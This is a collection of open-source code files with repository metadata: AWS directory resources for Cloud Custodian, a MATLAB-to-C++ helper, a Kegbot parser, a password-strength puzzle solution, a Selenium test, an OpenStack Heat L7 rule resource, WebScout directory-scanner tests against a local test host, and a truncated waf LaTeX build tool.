text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from __future__ import absolute_import, division, print_function, unicode_literals
from botocore.exceptions import ClientError
from c7n.manager import resources
from c7n.query import QueryResourceManager
from c7n.utils import local_session
from c7n.filters.vpc import SecurityGroupFilter, SubnetFilter
from c7n.tags import Tag, RemoveTag
@resources.register('directory')
class Directory(QueryResourceManager):
class resource_type(object):
service = "ds"
enum_spec = ("describe_directories", "DirectoryDescriptions", None)
name = "Name"
id = "DirectoryId"
dimension = None
filter_name = 'DirectoryIds'
filter_type = 'list'
permissions = ('ds:ListTagsForResource',)
def augment(self, directories):
def _add_tags(d):
client = local_session(self.session_factory).client('ds')
for t in client.list_tags_for_resource(
ResourceId=d['DirectoryId']).get('Tags', []):
d.setdefault('Tags', []).append(
{'Key': t['Key'], 'Value': t['Value']})
return d
with self.executor_factory(max_workers=2) as w:
return list(filter(None, w.map(_add_tags, directories)))
@Directory.filter_registry.register('subnet')
class DirectorySubnetFilter(SubnetFilter):
RelatedIdsExpression = "VpcSettings.SubnetIds"
@Directory.filter_registry.register('security-group')
class DirectorySecurityGroupFilter(SecurityGroupFilter):
RelatedIdsExpression = "VpcSettings.SecurityGroupId"
@Directory.action_registry.register('tag')
class DirectoryTag(Tag):
"""Add tags to a directory
:example:
.. code-block: yaml
policies:
- name: tag-directory
resource: directory
filters:
- "tag:desired-tag": absent
actions:
- type: tag
key: desired-tag
value: desired-value
"""
permissions = ('ds:AddTagToResource',)
def process_resource_set(self, directories, tags):
client = local_session(self.manager.session_factory).client('ds')
tag_list = []
for t in tags:
tag_list.append({'Key': t['Key'],'Value': t['Value']})
for d in directories:
try:
client.add_tags_to_resource(
ResourceId=d['DirectoryId'], Tags=tag_list)
except ClientError as e:
self.log.exception(
'Exception tagging Directory %s: %s', d['DirectoryId'], e)
continue
@Directory.action_registry.register('remove-tag')
class DirectoryRemoveTag(RemoveTag):
"""Remove tags from a directory
:example:
.. code-block: yaml
policies:
- name: remove-directory-tag
resource: directory
filters:
- "tag:desired-tag": present
actions:
- type: remove-tag
tags: ["desired-tag"]
"""
permissions = ('ds:RemoveTagsFromResource',)
def process_resource_set(self, directories, tags):
client = local_session(self.manager.session_factory).client('ds')
for d in directories:
try:
client.remove_tags_from_resource(
ResourceId=d['DirectoryId'], TagKeys=tags)
except ClientError as e:
self.log.exception(
'Exception removing tags from Directory %s: %s',
d['DirectoryId'], e)
continue
@resources.register('cloud-directory')
class CloudDirectory(QueryResourceManager):
class resource_type(object):
service = "clouddirectory"
enum_spec = ("list_directories", "Directories", None)
id = "DirectoryArn"
name = "Name"
dimension = None
filter_name = None
|
{
"content_hash": "a5548c8344ab3a618569d9d95a2b9bf6",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 82,
"avg_line_length": 31.062992125984252,
"alnum_prop": 0.5855513307984791,
"repo_name": "JohnTheodore/cloud-custodian",
"id": "3d577884891d5a6e6dba0f22f831236ffa57976b",
"size": "4535",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "c7n/resources/directory.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "6346"
},
{
"name": "Python",
"bytes": "2533086"
}
],
"symlink_target": ""
}
|
import matlab2cpp
def type_string(node):
"""
Determine string represnentation of type.
Outside scalars and armadillo, the datatype name and their declaration do not
match. This function converts simple datatype declaration and translate them to
equivalent C++ declarations.
+-----------------+-----------------------+
| Input | Output |
+=================+=======================+
| numerical types | node.type |
+-----------------+-----------------------+
| struct, structs | struct container name |
+-----------------+-----------------------+
| func_lambda | std::function<...> |
+-----------------+-----------------------+
| string | std::string |
+-----------------+-----------------------+
Args:
node (Node): location in tree
Returns:
str: String representation of node type
"""
# lambda-function
if node.type == "func_lambda":
# link to actual lambda-function
func = None
if hasattr(node.declare, "reference"):
func = node.declare.reference
elif "_"+node.name in node.program[1].names:
func = node.program[1]["_"+node.name]
if not (func is None):
# no returns in lambda
if len(func[1]) == 0:
ret = "void"
prm = ", ".join([p.type for p in func[2]])
# single return
elif len(func[1]) == 1:
ret = func[1][0].type
prm = ", ".join([p.type for p in func[2]])
# multiple return
else:
ret = "void"
prm = ", ".join([p.type for p in func[2][:]+func[1][:]])
return "std::function<" + ret + "(" + prm + ")>"
else:
node.warning("lambda function content not found")
return "std::function"
# struct scalar and array type
elif node.type in ("struct", "structs"):
declare = node.declare
if declare.parent.cls == "Struct":
declare = declare.parent
return "_" + declare.name.capitalize()
elif node.type == "string":
return "std::string"
return node.type
if __name__ == "__main__":
import doctest
doctest.testmod()
|
{
"content_hash": "9d65af4f90d311babe6a7804d06d7d37",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 79,
"avg_line_length": 28.846153846153847,
"alnum_prop": 0.47244444444444444,
"repo_name": "jonathf/matlab2cpp",
"id": "1e6c5af5ced7fa76423f7aba1450b851d3cb045b",
"size": "2250",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/matlab2cpp/rules/function.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "3618"
},
{
"name": "Mathematica",
"bytes": "43"
},
{
"name": "Matlab",
"bytes": "1560"
},
{
"name": "Python",
"bytes": "558665"
}
],
"symlink_target": ""
}
|
"""Methods for manipulating a time series.
A Kegbot core may report a time series (Drink.tick_time_series) for the meter
events that caused a drink.
"""
def from_string(s):
"""Converts a time series to a list of (int, int) tuples.
The string should be a sequence of zero or more <time>:<amount> pairs.
Whitespace delimits each pair; leading and trailing whitespace is ignored.
ValueError is raised on any malformed input.
"""
pairs = s.strip().split()
ret = []
for pair in pairs:
time, amount = pair.split(":")
time = int(time)
amount = int(amount)
if time < 0:
raise ValueError("Time cannot be less than zero: %s" % time)
ret.append((time, amount))
return ret
def to_string(pairs):
"""Converts a series of (int, int) tuples to a time series string."""
return " ".join("%i:%i" % pair for pair in pairs)
|
{
"content_hash": "3eef91ed89362021b188997fc3983cc5",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 78,
"avg_line_length": 30.2,
"alnum_prop": 0.6335540838852097,
"repo_name": "Kegbot/kegbot-server",
"id": "bcb1e22362d83b0fbeb12dd1a20797e60c493b79",
"size": "906",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pykeg/core/time_series.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "141465"
},
{
"name": "Dockerfile",
"bytes": "1836"
},
{
"name": "HTML",
"bytes": "122567"
},
{
"name": "JavaScript",
"bytes": "852819"
},
{
"name": "Less",
"bytes": "155169"
},
{
"name": "Makefile",
"bytes": "337"
},
{
"name": "Python",
"bytes": "671802"
},
{
"name": "Ruby",
"bytes": "161"
},
{
"name": "SCSS",
"bytes": "6040"
},
{
"name": "Shell",
"bytes": "581"
}
],
"symlink_target": ""
}
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the minimumNumber function below.
def minimumNumber(n, password):
# Return the minimum number of characters to make the password strong
isdigit_pass = False
islower_pass = False
isupper_pass = False
issplchar_pass = False
validations_pass = 0
for char in password:
if char.isdigit() and not isdigit_pass:
validations_pass += 1
isdigit_pass = True
#print("digit")
elif char.isalpha():
if char.islower() and not islower_pass:
validations_pass +=1
islower_pass = True
# print("lower")
elif char.isupper() and not isupper_pass:
validations_pass +=1
isupper_pass = True
# print("upper")
elif not char.isdigit() and not char.isalpha() and not issplchar_pass :
validations_pass +=1
issplchar_pass = True
# print("spl")
else:
pass
# print(validations_pass)
if len(password)<6:
return max(6-len(password), 4-validations_pass)
else:
return int(4-validations_pass)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
password = input()
answer = minimumNumber(n, password)
fptr.write(str(answer) + '\n')
fptr.close()
|
{
"content_hash": "c76fed907d580b789223e6b3e22b022d",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 79,
"avg_line_length": 26.527272727272727,
"alnum_prop": 0.564770390678547,
"repo_name": "MithileshCParab/HackerRank-10DaysOfStatistics",
"id": "81ca956cd95b921a28765b9a7e4e10e9778cfe90",
"size": "1459",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Problem Solving/Algorithms/Strings/strong_password.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "50206"
}
],
"symlink_target": ""
}
|
import pytest
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
@pytest.fixture
def driver(request):
wd = webdriver.Chrome()
print(wd.capabilities)
request.addfinalizer(wd.quit)
return wd
def test_example(driver):
driver.get("http://www.google.com/")
driver.find_element_by_name("q").send_keys("webdriver")
driver.find_element_by_name("btnG").click()
WebDriverWait(driver, 10).until(EC.title_is("webdriver - Поиск в Google"))
|
{
"content_hash": "c56b3bd12e80397f546014ba8cf99c52",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 78,
"avg_line_length": 29.736842105263158,
"alnum_prop": 0.7398230088495575,
"repo_name": "IvankaK/Testing",
"id": "7947d7e87955580e6d48bd07c5feb64785c360ee",
"size": "571",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test_example.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4876"
}
],
"symlink_target": ""
}
|
from heat.common import exception
from heat.common.i18n import _
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
class L7Rule(neutron.NeutronResource):
"""A resource for managing LBaaS v2 L7Rules.
This resource manages Neutron-LBaaS v2 L7Rules, which represent
a set of attributes that defines which part of the request should
be matched and how it should be matched.
"""
support_status = support.SupportStatus(version='7.0.0')
required_service_extension = 'lbaasv2'
entity = 'lbaas_l7rule'
res_info_key = 'rule'
PROPERTIES = (
ADMIN_STATE_UP, L7POLICY, TYPE, COMPARE_TYPE,
INVERT, KEY, VALUE
) = (
'admin_state_up', 'l7policy', 'type', 'compare_type',
'invert', 'key', 'value'
)
L7RULE_TYPES = (
HOST_NAME, PATH, FILE_TYPE, HEADER, COOKIE
) = (
'HOST_NAME', 'PATH', 'FILE_TYPE', 'HEADER', 'COOKIE'
)
L7COMPARE_TYPES = (
REGEX, STARTS_WITH, ENDS_WITH, CONTAINS, EQUAL_TO
) = (
'REGEX', 'STARTS_WITH', 'ENDS_WITH', 'CONTAINS', 'EQUAL_TO'
)
properties_schema = {
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('The administrative state of the rule.'),
default=True,
update_allowed=True
),
L7POLICY: properties.Schema(
properties.Schema.STRING,
_('ID or name of L7 policy this rule belongs to.'),
required=True
),
TYPE: properties.Schema(
properties.Schema.STRING,
_('Rule type.'),
constraints=[constraints.AllowedValues(L7RULE_TYPES)],
update_allowed=True,
required=True
),
COMPARE_TYPE: properties.Schema(
properties.Schema.STRING,
_('Rule compare type.'),
constraints=[constraints.AllowedValues(L7COMPARE_TYPES)],
update_allowed=True,
required=True
),
INVERT: properties.Schema(
properties.Schema.BOOLEAN,
_('Invert the compare type.'),
default=False,
update_allowed=True
),
KEY: properties.Schema(
properties.Schema.STRING,
_('Key to compare. Relevant for HEADER and COOKIE types only.'),
update_allowed=True
),
VALUE: properties.Schema(
properties.Schema.STRING,
_('Value to compare.'),
update_allowed=True,
required=True
)
}
def __init__(self, name, definition, stack):
super(L7Rule, self).__init__(name, definition, stack)
self._l7p_id = None
self._lb_id = None
@property
def l7policy_id(self):
client_plugin = self.client_plugin()
if self._l7p_id is None:
self._l7p_id = client_plugin.find_resourceid_by_name_or_id(
client_plugin.RES_TYPE_LB_L7POLICY,
self.properties[self.L7POLICY])
return self._l7p_id
@property
def lb_id(self):
if self._lb_id is None:
policy = self.client().show_lbaas_l7policy(
self.l7policy_id)['l7policy']
listener_id = policy['listener_id']
listener = self.client().show_listener(listener_id)['listener']
self._lb_id = listener['loadbalancers'][0]['id']
return self._lb_id
def _check_lb_status(self):
return self.client_plugin().check_lb_status(self.lb_id)
def validate(self):
res = super(L7Rule, self).validate()
if res:
return res
if (self.properties[self.TYPE] in (self.HEADER, self.COOKIE) and
self.properties[self.KEY] is None):
msg = (_('Property %(key)s is missing. '
'This property should be specified for '
'rules of %(header)s and %(cookie)s types.') %
{'key': self.KEY,
'header': self.HEADER,
'cookie': self.COOKIE})
raise exception.StackValidationFailed(message=msg)
def handle_create(self):
rule_args = dict((k, v) for k, v in self.properties.items()
if k != self.L7POLICY)
return rule_args
def check_create_complete(self, rule_args):
if self.resource_id is None:
try:
l7rule = self.client().create_lbaas_l7rule(
self.l7policy_id,
{'rule': rule_args})['rule']
self.resource_id_set(l7rule['id'])
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def _res_get_args(self):
return [self.resource_id, self.l7policy_id]
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
self._update_called = False
if (prop_diff.get(self.TYPE) in (self.COOKIE, self.HEADER) and
prop_diff.get(self.KEY) is None):
prop_diff[self.KEY] = tmpl_diff['Properties'].get(self.KEY)
return prop_diff
def check_update_complete(self, prop_diff):
if not prop_diff:
return True
if not self._update_called:
try:
self.client().update_lbaas_l7rule(
self.resource_id,
self.l7policy_id,
{'rule': prop_diff})
self._update_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def handle_delete(self):
self._delete_called = False
def check_delete_complete(self, data):
if self.resource_id is None:
return True
if not self._delete_called:
try:
self.client().delete_lbaas_l7rule(
self.resource_id,
self.l7policy_id)
self._delete_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
elif self.client_plugin().is_not_found(ex):
return True
raise
return self._check_lb_status()
def resource_mapping():
return {
'OS::Neutron::LBaaS::L7Rule': L7Rule
}
|
{
"content_hash": "5c6f7cdee134677d29ec106bbe3ff984",
"timestamp": "",
"source": "github",
"line_count": 206,
"max_line_length": 76,
"avg_line_length": 32.092233009708735,
"alnum_prop": 0.5453032824081077,
"repo_name": "openstack/heat",
"id": "28d0052e3d84f05e1b30632c4495a349dc390ecb",
"size": "7186",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "heat/engine/resources/openstack/neutron/lbaas/l7rule.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9145593"
},
{
"name": "Shell",
"bytes": "65832"
}
],
"symlink_target": ""
}
|
"""
This is part of WebScout software
Docs EN: http://hack4sec.pro/wiki/index.php/WebScout_en
Docs RU: http://hack4sec.pro/wiki/index.php/WebScout
License: MIT
Copyright (c) Anton Kuzmin <http://anton-kuzmin.ru> (ru) <http://anton-kuzmin.pro> (en)
Tests of DafsMask module
"""
import sys
import os
import time
import pytest
import requests
from libs.common import file_get_contents, t
wrpath = os.path.realpath(os.path.dirname(os.path.realpath(__file__)) + '/../../')
testpath = os.path.realpath(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(wrpath)
sys.path.append(wrpath + '/classes')
sys.path.append(testpath + '/classes')
sys.path.append(wrpath + '/classes/models')
sys.path.append(wrpath + '/classes/jobs')
sys.path.append(wrpath + '/classes/threads')
sys.path.append(wrpath + '/classes/kernel')
from CommonTest import CommonTest
class Test_RunDafsMask(CommonTest):
"""Tests of DafsMask module"""
method = None
check_method = None
use_https = False
selenium = False
dict = None
mask = None
masks = {'?l': 26}
def setup(self):
CommonTest.setup(self)
self.method = None
self.check_method = None
self.use_https = False
self.selenium = False
self.dict = None
self.mask = None
requests.get("http://wrtest.com/?clean_log=1")
requests.get("http://wrtest.com/?protect_disable=1")
requests.get("http://wrtest.com/?found_disable=1")
def _prepare_db(self):
self.db.q("TRUNCATE TABLE `projects`")
self.db.q("TRUNCATE TABLE `ips`")
self.db.q("TRUNCATE TABLE `hosts`")
self.db.q("TRUNCATE TABLE `hosts_info`")
self.db.q("TRUNCATE TABLE `urls`")
self.db.q("TRUNCATE TABLE `requests`")
self.db.q("INSERT INTO projects (id, name, descr) VALUES(1, 'test', '')")
self.db.q("INSERT INTO ips (id, project_id, ip, descr) VALUES(1, 1, '127.0.0.1', '')")
self.db.q("INSERT INTO `hosts` (id, project_id, ip_id, name, descr) VALUES (1,1,1,'wrtest.com', 'hd1')")
def _logger(self, content=True, good_items=None, bad_items=None, in_output=None):
"""
Check logger work
:param content: We check content?
:param good_items: This items was found
:param bad_items: This items was not found
:param in_output: check this phrases in output
:return:
"""
good_items = good_items or []
bad_items = bad_items or []
in_output = in_output or []
logs_path = "{0}/logs/dafs/{1}/".format(wrpath, t("%Y-%m-%d"))
time_dir = sorted(os.listdir(logs_path))[-1]
run_log_data = file_get_contents("{0}/{1}/run.log".format(logs_path, time_dir))
assert "Loaded {0} words from source".format(self._how_many_variants()) in run_log_data
for item in in_output:
assert item in run_log_data
for item in bad_items:
assert os.path.exists("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))
if self.check_method != 'head':
assert ('<h1>Not Found</h1>' if content else '') in \
file_get_contents("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))
for item in good_items:
assert os.path.exists("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))
if self.check_method != 'head':
assert '<h1>Not Found</h1>' not in \
file_get_contents("{0}/{1}/items/{2}.txt".format(logs_path, time_dir, item))
def _how_many_variants(self):
"""How many variants for requests we have?"""
return self.masks[self.mask]
def _check_requests_log(self, selenium_results=False):
"""
Check requests log from server
:param selenium_results: we checking selenium results?
:return:
"""
resp = requests.get("http://wrtest.com/?get_log=1").text.strip()
# Selenium make 5 other requests - redirect to roos and css/js from there
if selenium_results:
assert len(resp.split("\n")) == \
(self._how_many_variants() if not self.selenium else self._how_many_variants() + 5)
else:
assert len(resp.split("\n")) == self._how_many_variants()
for _str in resp.split("\n"):
tmp_protocol, tmp_ua, tmp_method, tmp_url = _str.split("\t")
assert tmp_method.lower() == self.check_method.lower()
assert tmp_protocol.lower() == ('https' if self.use_https else 'http')
# No dups
assert len(resp.split("\n")) == len(resp.split("\n"))
test_scan_dirs_data = [
('get', 'get', False, '@', False),
('get', 'get', True, '@', False),
('post', 'post', False, '@', False),
('post', 'post', True, '@', False),
('head', 'head', False, '@', False),
('head', 'head', True, '@', False),
(False, 'head', False, '@', False),
(False, 'head', True, '@', False),
('get', 'get', False, '%', False),
('head', 'get', True, '@', '--not-found-re=aaa'),
]
@pytest.mark.parametrize("method,check_method,use_https,msymbol,not_found_re", test_scan_dirs_data)
def test_scan(self, method, check_method, use_https, msymbol, not_found_re):
self._prepare_db()
self.use_https = use_https
self.check_method = check_method
self.mask = '?l'
run_params = [
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--mask=' + self.mask
]
if method:
run_params.append('--method=' + method)
if not_found_re:
run_params.append(not_found_re)
if use_https:
run_params.append('--protocol=https')
if msymbol != '@':
run_params.append('--msymbol=' + msymbol)
run_params.append('--template=/' + msymbol + '/')
else:
run_params.append('--template=/@/')
self._run('normal', run_params)
assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 4
test_urls = ['/a/', '/b/', '/c/']
have_urls = self.db.fetch_col("SELECT url FROM urls")
for test_url in test_urls:
assert test_url in have_urls
assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 4
assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base") == 4
assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='c' AND parent_id=1 AND host_id=1") == 1
assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='b' AND parent_id=1 AND host_id=1") == 1
assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='a' AND parent_id=1 AND host_id=1") == 1
assert self.db.fetch_one("SELECT COUNT(id) FROM urls_base WHERE name='/' AND parent_id=0 AND host_id=1") == 1
self._logger(good_items=['a', 'b', 'c'], bad_items=['d', 'e', 'f'], in_output=['/a/', '/b/', '/c/'])
self._check_requests_log()
def test_scan_maxsize_error_head(self):
self._prepare_db()
out = self._run('normal', [
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
'--template=/@', '--mask=maxsize', '--method=head'
])
assert bool(out.count('but limit in config'))
assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 0
def test_scan_with_delay(self):
self._prepare_db()
self._prepare_db()
self.check_method = 'head'
self.mask = '?l'
stime = int(time.time())
self._run('normal', [
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@/', '--mask=' + self.mask,
])
first_time = int(time.time()) - stime
time.sleep(1)
stime = int(time.time())
self._run('normal', [
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@/', '--mask=' + self.mask,
'--threads=1', '--delay=2'
])
second_time = int(time.time()) - stime
assert second_time/first_time >= 3
many_positives_data = [
(False),
(True)
]
@pytest.mark.parametrize("selenium", many_positives_data)
def test_scan_many_positives(self, selenium):
""" Usual GET scan on dirs HEAD method with many positives process die """
requests.get("http://wrtest.com/?found_enable=1")
self._prepare_db()
self.check_method = 'get'
self.mask = '?l'
run_params = [
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@/', '--mask=' + self.mask,
]
if selenium:
run_params.append('--selenium=1')
run_params.append('--not-found-re=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
run_params.append('--threads=1')
out = self._run('many-positives', run_params)
assert 'Many positive detections' in out
assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 0
selenium_scan_protect_data = [
(True, '--ddos-detect-phrase=PROTECTION', False),
(True, '--ddos-detect-phrase=PROTECTION', True),
(False, '', False),
(True, '--ddos-human-action=PROTECTION', False),
]
@pytest.mark.parametrize("use_protect,protect_param,use_https", selenium_scan_protect_data)
def test_selenium_scan_protection(self, use_protect, protect_param, use_https):
self._prepare_db()
self.check_method = 'get'
self.selenium = True
self.use_https = use_https
self.mask = '?l'
run_params = [
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
'--template=/@/',
'--mask=' + self.mask,
'--selenium=1', '--threads=1', '--not-found-re=Not Found'
]
if use_protect:
requests.get("http://wrtest.com/?protect_enable=1")
run_params.append(protect_param)
if use_https:
run_params.append('--protocol=https')
self._run('normal', run_params)
assert self.db.fetch_one("SELECT COUNT(id) FROM urls") == 4
self._logger(good_items=['a', 'b', 'c'], bad_items=['d', 'e', 'f'], in_output=['/a/', '/b/', '/c/'])
self._check_requests_log(selenium_results=True)
error_cmds = [
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=notfound.com', '--template=/@',
'--mask=l', '--method=HEAD'
],
'not found in this project'
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
'--mask=l', '--protocol=test'
],
'Protocol param must be '
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
'--template=/@', '--mask=l', '--method=test'
],
'Method param must be only '
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com',
'--template=/@', '--mask=l', '--not-found-codes=301,a,302'
],
'Not-found code must be digital, but'
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
'--mask=l', '--parts=a', '--part=1'
],
'Parts param must be digital, but'
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
'--mask=l', '--part=a', '--parts=2'
],
'Part param must be digital, but'
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
'--mask=l', '--part=1'
],
"If you use '--part' param, you must specify '--parts'"
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
'--mask=l', '--parts=1'
],
"If you use '--parts' param, you must specify '--part'"
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
'--mask=l', '--parts=1', '--part=2'
],
'Number of part'
),
(
[
'./main.py', 'test', 'DafsMask', 'scan', '--host=wrtest.com', '--template=/@',
'--mask=l', '--delay=a'
],
'Delay param must be digital, but'
),
]
@pytest.mark.parametrize("cmd_set,check_phrase", error_cmds)
def test_error(self, cmd_set, check_phrase):
self._prepare_db()
out = self._run('normal', cmd_set)
assert out.count(check_phrase)
|
{
"content_hash": "2e930dd156679a54dde081800e8209cc",
"timestamp": "",
"source": "github",
"line_count": 342,
"max_line_length": 117,
"avg_line_length": 38.07017543859649,
"alnum_prop": 0.5236559139784946,
"repo_name": "hack4sec/ws-cli",
"id": "95881f15caeb54a1917a1a38724c01ba444ed325",
"size": "13044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/run/test_RunDafsMask.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "680434"
}
],
"symlink_target": ""
}
|
import os,re
from waflib import Utils,Task,Errors,Logs,Node
from waflib.TaskGen import feature,before_method
re_bibunit=re.compile(r'\\(?P<type>putbib)\[(?P<file>[^\[\]]*)\]',re.M)
def bibunitscan(self):
node=self.inputs[0]
nodes=[]
if not node:return nodes
code=node.read()
for match in re_bibunit.finditer(code):
path=match.group('file')
if path:
for k in('','.bib'):
Logs.debug('tex: trying %s%s'%(path,k))
fi=node.parent.find_resource(path+k)
if fi:
nodes.append(fi)
else:
Logs.debug('tex: could not find %s'%path)
Logs.debug("tex: found the following bibunit files: %s"%nodes)
return nodes
exts_deps_tex=['','.ltx','.tex','.bib','.pdf','.png','.eps','.ps','.sty']
exts_tex=['.ltx','.tex']
re_tex=re.compile(r'\\(?P<type>usepackage|RequirePackage|include|bibliography([^\[\]{}]*)|putbib|includegraphics|input|import|bringin|lstinputlisting)(\[[^\[\]]*\])?{(?P<file>[^{}]*)}',re.M)
g_bibtex_re=re.compile('bibdata',re.M)
g_glossaries_re=re.compile('\\@newglossary',re.M)
class tex(Task.Task):
bibtex_fun,_=Task.compile_fun('${BIBTEX} ${BIBTEXFLAGS} ${SRCFILE}',shell=False)
bibtex_fun.__doc__="""
Execute the program **bibtex**
"""
makeindex_fun,_=Task.compile_fun('${MAKEINDEX} ${MAKEINDEXFLAGS} ${SRCFILE}',shell=False)
makeindex_fun.__doc__="""
Execute the program **makeindex**
"""
makeglossaries_fun,_=Task.compile_fun('${MAKEGLOSSARIES} ${SRCFILE}',shell=False)
makeglossaries_fun.__doc__="""
Execute the program **makeglossaries**
"""
def exec_command(self,cmd,**kw):
bld=self.generator.bld
Logs.info('runner: %r'%cmd)
try:
if not kw.get('cwd',None):
kw['cwd']=bld.cwd
except AttributeError:
bld.cwd=kw['cwd']=bld.variant_dir
return Utils.subprocess.Popen(cmd,**kw).wait()
def scan_aux(self,node):
nodes=[node]
re_aux=re.compile(r'\\@input{(?P<file>[^{}]*)}',re.M)
def parse_node(node):
code=node.read()
for match in re_aux.finditer(code):
path=match.group('file')
found=node.parent.find_or_declare(path)
if found and found not in nodes:
Logs.debug('tex: found aux node '+found.abspath())
nodes.append(found)
parse_node(found)
parse_node(node)
return nodes
def scan(self):
node=self.inputs[0]
nodes=[]
names=[]
seen=[]
if not node:return(nodes,names)
def parse_node(node):
if node in seen:
return
seen.append(node)
code=node.read()
global re_tex
for match in re_tex.finditer(code):
multibib=match.group('type')
if multibib and multibib.startswith('bibliography'):
multibib=multibib[len('bibliography'):]
if multibib.startswith('style'):
continue
else:
multibib=None
for path in match.group('file').split(','):
if path:
add_name=True
found=None
for k in exts_deps_tex:
for up in self.texinputs_nodes:
Logs.debug('tex: trying %s%s'%(path,k))
found=up.find_resource(path+k)
if found:
break
for tsk in self.generator.tasks:
if not found or found in tsk.outputs:
break
else:
nodes.append(found)
add_name=False
for ext in exts_tex:
if found.name.endswith(ext):
parse_node(found)
break
if found and multibib and found.name.endswith('.bib'):
try:
self.multibibs.append(found)
except AttributeError:
self.multibibs=[found]
if add_name:
names.append(path)
parse_node(node)
for x in nodes:
x.parent.get_bld().mkdir()
Logs.debug("tex: found the following : %s and names %s"%(nodes,names))
return(nodes,names)
def check_status(self,msg,retcode):
if retcode!=0:
raise Errors.WafError("%r command exit status %r"%(msg,retcode))
def bibfile(self):
for aux_node in self.aux_nodes:
try:
ct=aux_node.read()
except EnvironmentError:
Logs.error('Error reading %s: %r'%aux_node.abspath())
continue
if g_bibtex_re.findall(ct):
Logs.info('calling bibtex')
self.env.env={}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS':self.texinputs(),'BSTINPUTS':self.texinputs()})
self.env.SRCFILE=aux_node.name[:-4]
self.check_status('error when calling bibtex',self.bibtex_fun())
for node in getattr(self,'multibibs',[]):
self.env.env={}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS':self.texinputs(),'BSTINPUTS':self.texinputs()})
self.env.SRCFILE=node.name[:-4]
self.check_status('error when calling bibtex',self.bibtex_fun())
def bibunits(self):
try:
bibunits=bibunitscan(self)
except OSError:
Logs.error('error bibunitscan')
else:
if bibunits:
fn=['bu'+str(i)for i in range(1,len(bibunits)+1)]
if fn:
Logs.info('calling bibtex on bibunits')
for f in fn:
self.env.env={'BIBINPUTS':self.texinputs(),'BSTINPUTS':self.texinputs()}
self.env.SRCFILE=f
self.check_status('error when calling bibtex',self.bibtex_fun())
def makeindex(self):
self.idx_node=self.inputs[0].change_ext('.idx')
try:
idx_path=self.idx_node.abspath()
os.stat(idx_path)
except OSError:
Logs.info('index file %s absent, not calling makeindex'%idx_path)
else:
Logs.info('calling makeindex')
self.env.SRCFILE=self.idx_node.name
self.env.env={}
self.check_status('error when calling makeindex %s'%idx_path,self.makeindex_fun())
def bibtopic(self):
p=self.inputs[0].parent.get_bld()
if os.path.exists(os.path.join(p.abspath(),'btaux.aux')):
